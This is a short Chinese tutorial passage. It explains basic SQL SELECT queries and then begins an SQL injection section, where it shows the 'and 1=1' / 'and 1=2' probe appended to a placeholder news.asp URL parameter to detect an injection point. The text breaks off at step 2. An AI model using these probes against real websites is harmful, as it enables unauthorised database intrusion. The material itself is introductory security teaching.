SQL语句:
select * from XXX; #显示XXX表中的所有记录
select * from XXX where id=1; #从XXX表中查找满足条件id=1的记录
select usernanme,password from XXX where id=1 #从XXX表中查找满足条件id=1,并且只显示username,password字段内容
select * from XXX where id=1 and username="admin" #从XXX表中查找id=1且username="admin"的记录
select * from XXX where id=1 or username="admin" #从XXX表中查找id=1或者username
SQL注入:
http://www.xxxx.com/news.asp?id=4
select * from news where id=16
1、查询是否存在注入点:http://www.xxxx.com/news.asp?id=4 and 1=1 如果返回页面与之前没有差别,http://www.xxxx.com/news.asp?id=4 and 1=2 返回错误页面,则表示该网站存在注入点、
2、
